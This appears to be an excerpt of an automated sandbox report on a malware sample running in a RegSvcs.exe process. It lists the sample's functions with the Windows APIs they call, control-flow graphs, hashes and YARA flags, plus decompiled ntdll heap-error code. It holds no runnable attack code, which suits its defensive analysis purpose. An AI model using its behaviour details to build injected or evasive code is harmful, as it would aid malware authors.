                                          • Opcode Fuzzy Hash: 1ed508e0c1479fd51ca27d8f4ca93e8f9cc4b3cfe03b86c0649f6ea35fb5846c
                                          • Instruction Fuzzy Hash: C401D831A4022876EB20A6918C43FFE775C9B40B58F04012EFF04FA1C1E6A8690686E9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040C327 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 281 40c327-40c350 call 420837 284 40c352-40c355 281->284 285 40c356-40c364 call 420c57 281->285 288 40c374-40c385 call 41f0b7 285->288 289 40c366-40c371 call 420ed7 285->289 294 40c387-40c39b LdrLoadDll 288->294 295 40c39e-40c3a1 288->295 289->288 294->295
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040C399
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 6c37b4ee0db3cad1e0504e0529d0d02f5f61a9f0c43e8050fefe1f91f0640f86
                                          • Instruction ID: 52dad2fc6da59864e4536e2b798137fde6e463d7ef12a331b6a533209a173677
                                          • Opcode Fuzzy Hash: 6c37b4ee0db3cad1e0504e0529d0d02f5f61a9f0c43e8050fefe1f91f0640f86
                                          • Instruction Fuzzy Hash: 840152B5E0010DE7DB10DBA1DC42F9EB7B89F54304F0082A5ED08A7281F635EB48CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E13E Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 296 41e13e-41e142 297 41e144 296->297 298 41e176 296->298 299 41e189-41e18b 297->299 300 41e146-41e15d 297->300 298->299 301 41e193-41e1a8 RtlAllocateHeap 299->301 302 41e18e call 41eb17 299->302 303 41e163-41e174 300->303 304 41e15e call 41eb17 300->304 302->301 304->303
                                          APIs
                                          • RtlAllocateHeap.NTDLL(0041814D,?,004188F4,004188F4,?,0041814D,?,?,?,?,?,00000000,00000005,00000206), ref: 0041E1A4
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 757039e2b31712dea58105c8837dab04ab6a20ba5375103a478282a305920402
                                          • Instruction ID: 8d1316d563e2aaf03bd08c337fc832e1a4a3cebe32cd46d98467985e7523ee24
                                          • Opcode Fuzzy Hash: 757039e2b31712dea58105c8837dab04ab6a20ba5375103a478282a305920402
                                          • Instruction Fuzzy Hash: 4AF0AFB5604204BFDB24DF95EC81DEB7769EF84364F10891AFC0A87742D635E911CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E308 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 315 41e308-41e331 call 41eb17 317 41e336-41e34b LookupPrivilegeValueW 315->317
                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F399,0040F399,?,00000000,?,?), ref: 0041E347
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 81c31ca114a574e5342175063c30442c26e61751ee60c9a8b8ab415d54d3fe98
                                          • Instruction ID: 495473aebacf56c98ac73e8a961da2925d7209559082377b2d4d5fb05a355e1c
                                          • Opcode Fuzzy Hash: 81c31ca114a574e5342175063c30442c26e61751ee60c9a8b8ab415d54d3fe98
                                          • Instruction Fuzzy Hash: BBE0EDB1300204AFC720DF59CC44EE737A9AF88364F1485ADFD08A7241D630E900CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E177 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(0041814D,?,004188F4,004188F4,?,0041814D,?,?,?,?,?,00000000,00000005,00000206), ref: 0041E1A4
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                                          • Instruction ID: 39b5cabef950e6491fd1ff11e6bcb4f47bb735b4b1560f452d24bb2e9d3c42ad
                                          • Opcode Fuzzy Hash: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                                          • Instruction Fuzzy Hash: 83E046B5200218ABDB18EF9ADC45EE737ACEF88764F018159FE095B242C630F910CBB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E1B7 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0041E1E4
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                                          • Instruction ID: 1d552643a1b6a9e7e8cbaa6fd288b4534f8ea2684dbb839d41cd3eb30db23803
                                          • Opcode Fuzzy Hash: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                                          • Instruction Fuzzy Hash: 83E04FB52002146BD714DF49DC49ED737ACEF88754F014155FD0957241D630F914CBB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E317 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F399,0040F399,?,00000000,?,?), ref: 0041E347
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                                          • Instruction ID: fb85849f582dcab3273909ea3b6beb81fed045dfd13ab71d80f81a5ef931559d
                                          • Opcode Fuzzy Hash: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                                          • Instruction Fuzzy Hash: 04E01AB52002186BD710DF49DC45EE737ADAF89664F118159BE0957241D631F8108AB5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040F547 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 318 40f547-40f56b call 418a97 321 40f56d-40f56e 318->321 322 40f56f-40f580 GetUserGeoID 318->322
                                          APIs
                                          • GetUserGeoID.KERNELBASE(00000010), ref: 0040F571
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: User
                                          • String ID:
                                          • API String ID: 765557111-0
                                          • Opcode ID: c0b073c48b573d6fd42d72d857da5cd3fadecb69c48674ccfcd042dcae8d0138
                                          • Instruction ID: bd466c9d94490778018d0173dd1bcc1bb0bb5a50ad64b5075612b8472f4dc12d
                                          • Opcode Fuzzy Hash: c0b073c48b573d6fd42d72d857da5cd3fadecb69c48674ccfcd042dcae8d0138
                                          • Instruction Fuzzy Hash: ECE02B3378030427F630D5E59C42FB6368E5F84B44F048475F90CEB3C1E5B9E5800024
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E1A9 Relevance: 1.5, APIs: 1, Instructions: 23memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0041E1E4
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: ea130578f0c8bb043f8c8b45987bd307f222320f3a56207a9e4d2d91bf9ef149
                                          • Instruction ID: dff9f653467797b72a33652ebf7f400ae81a1b667be369d033710bea9809b9a6
                                          • Opcode Fuzzy Hash: ea130578f0c8bb043f8c8b45987bd307f222320f3a56207a9e4d2d91bf9ef149
                                          • Instruction Fuzzy Hash: 0AE0D8B81082C64BDB05DF76A9D08973B94EF42314304498AE89547707D134D855CBB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E1F7 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                          Download Yara Rule
                                          APIs
                                          • ExitProcess.KERNEL32(?,00000000,000000FC,?,?,00000001), ref: 0041E21F
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: 0c6232b6cdbf6635767260dc15682acedaa1cab9f782f361699728f7b20cdda3
                                          • Instruction ID: 71b31a6e052b90d658ead73e1ea1e15e08fcd2b9b7f1fc59455b7fbc18c8b61a
                                          • Opcode Fuzzy Hash: 0c6232b6cdbf6635767260dc15682acedaa1cab9f782f361699728f7b20cdda3
                                          • Instruction Fuzzy Hash: 15D0C2313002187BC620DB89CC45FD3379CDF457A4F004065BA0C5B241C530BA00C7E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0133967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: aff2848a93a151363f93a2fd1924b56720bbee6846e03afe8024df7c3559baf0
                                          • Instruction ID: a4ab471299511e14346808815ac812465a2f38489bf1a4d4109bb17f609530a4
                                          • Opcode Fuzzy Hash: aff2848a93a151363f93a2fd1924b56720bbee6846e03afe8024df7c3559baf0
                                          • Instruction Fuzzy Hash: FBB09B719064C5C6DA11D7A44608717794477D0759F16C061D1020681B4778D495F6B9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 0040FE97 Relevance: 304.5, Strings: 243, Instructions: 770COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $ $ $ $0$3$7$7$A$A$A$A$B$B$B$B$B$B$B$C$C$C$C$C$C$C$C$C$C$C$C$D$E$E$E$F$G$G$I$K$K$M$M$M$O$O$O$P$P$Q$S$S$S$S$S$S$S$S$T$T$U$U$V$Y$\$\$\$\$\$\$a$a$a$a$a$a$a$a$a$a$a$b$c$c$c$d$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$f$f$f$g$g$h$h$i$i$i$i$i$i$i$i$i$i$j$k$k$k$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$v$v$w$w$w$w$w$w$w$w$w$w$y
                                          • API String ID: 0-3432132569
                                          • Opcode ID: 0f6616884ceb20d3e75de271bb9417fe4150508218268d80cfa9ddf3cbd4b58b
                                          • Instruction ID: 863fbf5347be887f7057d4e126217049090c9b3795fb353c5ab9518572d6fef4
                                          • Opcode Fuzzy Hash: 0f6616884ceb20d3e75de271bb9417fe4150508218268d80cfa9ddf3cbd4b58b
                                          • Instruction Fuzzy Hash: BF92EFB18007189EDB25DF51C849BEABBB9BF04708F4046ED910D6A252DBB95BCCCF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013AB260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Strings
                                          • *** enter .cxr %p for the context, xrefs: 013AB50D
                                          • The instruction at %p tried to %s , xrefs: 013AB4B6
                                          • read from, xrefs: 013AB4AD, 013AB4B2
                                          • The instruction at %p referenced memory at %p., xrefs: 013AB432
                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 013AB47D
                                          • The resource is owned shared by %d threads, xrefs: 013AB37E
                                          • *** enter .exr %p for the exception record, xrefs: 013AB4F1
                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 013AB2DC
                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 013AB39B
                                          • a NULL pointer, xrefs: 013AB4E0
                                          • *** then kb to get the faulting stack, xrefs: 013AB51C
                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 013AB305
                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 013AB38F
                                          • This failed because of error %Ix., xrefs: 013AB446
                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 013AB53F
                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 013AB2F3
                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 013AB352
                                          • Go determine why that thread has not released the critical section., xrefs: 013AB3C5
                                          • The critical section is owned by thread %p., xrefs: 013AB3B9
                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 013AB314
                                          • an invalid address, %p, xrefs: 013AB4CF
                                          • <unknown>, xrefs: 013AB27E, 013AB2D1, 013AB350, 013AB399, 013AB417, 013AB48E
                                          • *** An Access Violation occurred in %ws:%s, xrefs: 013AB48F
                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 013AB476
                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 013AB323
                                          • The resource is owned exclusively by thread %p, xrefs: 013AB374
                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 013AB3D6
                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 013AB484
                                          • write to, xrefs: 013AB4A6
                                          • *** Inpage error in %ws:%s, xrefs: 013AB418
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                          • API String ID: 0-108210295
                                          • Opcode ID: a22e6c88b62a729835bc1540c8218a775af2d541cf305a31a002bc6d551a7411
                                          • Instruction ID: 3a3b55f300012cfd235f8cf568457d530843f9f5ce64dfea32008e11ca604b62
                                          • Opcode Fuzzy Hash: a22e6c88b62a729835bc1540c8218a775af2d541cf305a31a002bc6d551a7411
                                          • Instruction Fuzzy Hash: E0812335A10204FFDB21BB6ACC49EBB7F7AEF56A59FC14048F5052B116E3618851CBB2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013B1C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 44%
                                          			E013B1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x12d48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E012FB150();
				} else {
					E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x13e589c);
				E012FB150("Heap error detected at %p (heap handle %p)\n",  *0x13e58a0);
				_t27 =  *0x13e5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M013B1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E012FB150();
				} else {
					E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E012FB150("Error code: %d - %s\n",  *0x13e5898);
				_t113 =  *0x13e58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E012FB150();
					} else {
						E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E012FB150("Parameter1: %p\n",  *0x13e58a4);
				}
				_t115 =  *0x13e58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E012FB150();
					} else {
						E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E012FB150("Parameter2: %p\n",  *0x13e58a8);
				}
				_t117 =  *0x13e58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E012FB150();
					} else {
						E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E012FB150("Parameter3: %p\n",  *0x13e58ac);
				}
				_t119 =  *0x13e58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E012FB150();
					} else {
						E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x13e58b4);
					E012FB150("Last known valid blocks: before - %p, after - %p\n",  *0x13e58b0);
				} else {
					_t120 =  *0x13e58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E012FB150();
				} else {
					E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E012FB150("Stack trace available at %p\n", 0x13e58c0);
			}











                                          0x013b1c10
                                          0x013b1c16
                                          0x013b1c1e
                                          0x013b1c3d
                                          0x013b1c3e
                                          0x013b1c20
                                          0x013b1c35
                                          0x013b1c3a
                                          0x013b1c44
                                          0x013b1c55
                                          0x013b1c5a
                                          0x013b1c65
                                          0x013b1c67
                                          0x00000000
                                          0x013b1c6e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013b1c67
                                          0x013b1cdc
                                          0x013b1ce5
                                          0x013b1d04
                                          0x013b1d05
                                          0x013b1ce7
                                          0x013b1cfc
                                          0x013b1d01
                                          0x013b1d0b
                                          0x013b1d17
                                          0x013b1d1f
                                          0x013b1d25
                                          0x013b1d30
                                          0x013b1d4f
                                          0x013b1d50
                                          0x013b1d32
                                          0x013b1d47
                                          0x013b1d4c
                                          0x013b1d61
                                          0x013b1d67
                                          0x013b1d68
                                          0x013b1d6e
                                          0x013b1d79
                                          0x013b1d98
                                          0x013b1d99
                                          0x013b1d7b
                                          0x013b1d90
                                          0x013b1d95
                                          0x013b1daa
                                          0x013b1db0
                                          0x013b1db1
                                          0x013b1db7
                                          0x013b1dc2
                                          0x013b1de1
                                          0x013b1de2
                                          0x013b1dc4
                                          0x013b1dd9
                                          0x013b1dde
                                          0x013b1df3
                                          0x013b1df9
                                          0x013b1dfa
                                          0x013b1e00
                                          0x013b1e0a
                                          0x013b1e13
                                          0x013b1e32
                                          0x013b1e33
                                          0x013b1e15
                                          0x013b1e2a
                                          0x013b1e2f
                                          0x013b1e39
                                          0x013b1e4a
                                          0x013b1e02
                                          0x013b1e02
                                          0x013b1e08
                                          0x00000000
                                          0x00000000
                                          0x013b1e08
                                          0x013b1e5b
                                          0x013b1e7a
                                          0x013b1e7b
                                          0x013b1e5d
                                          0x013b1e72
                                          0x013b1e77
                                          0x013b1e95

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                          • API String ID: 0-2897834094
                                          • Opcode ID: dd7347e4569e74eeed25edc41209b2427fdf907d98b063c44af7dce4f4701694
                                          • Instruction ID: 142ce8e72c2d5b704d45649c61254f78331770ac434b903f07ac1de93c6f4c5a
                                          • Opcode Fuzzy Hash: dd7347e4569e74eeed25edc41209b2427fdf907d98b063c44af7dce4f4701694
                                          • Instruction Fuzzy Hash: 1461B537631149DFD621AB49F4E9D75B7E8EB04A28F4A803EF70D5BB41E73498408B1A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013B2D82 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 228timeCOMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 64%
                                          			E013B2D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t83;
				signed char _t89;
				intOrPtr _t90;
				signed char _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				short* _t130;
				short _t131;
				signed int _t148;
				intOrPtr _t149;
				signed int* _t154;
				short* _t165;
				signed int _t171;
				void* _t182;

				_push(0x44);
				_push(0x13d0e80);
				E0134D0E8(__ebx, __edi, __esi);
				_t177 = __edx;
				_t181 = __ecx;
				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
				 *((char*)(_t182 - 0x1d)) = 0;
				 *(_t182 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t182 - 4)) = 0;
					 *((intOrPtr*)(_t182 - 4)) = 1;
					_t83 = E012F40E1("RtlAllocateHeap");
					__eflags = _t83;
					if(_t83 == 0) {
						L48:
						 *(_t182 - 0x24) = 0;
						L49:
						 *((intOrPtr*)(_t182 - 4)) = 0;
						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
						E013B30C4();
						goto L50;
					}
					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
					 *(_t182 - 0x28) = _t89;
					 *(_t182 - 0x3c) = _t89;
					_t177 =  *(_t182 + 8);
					__eflags = _t177;
					if(_t177 == 0) {
						_t171 = 1;
						__eflags = 1;
					} else {
						_t171 = _t177;
					}
					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
					__eflags = _t148 - 0x10;
					if(_t148 < 0x10) {
						_t148 = 0x10;
					}
					_t149 = _t148 + 8;
					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
					__eflags = _t149 - _t177;
					if(_t149 < _t177) {
						L44:
						_t90 =  *[fs:0x30];
						__eflags =  *(_t90 + 0xc);
						if( *(_t90 + 0xc) == 0) {
							_push("HEAP: ");
							E012FB150();
						} else {
							E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t181 + 0x78)));
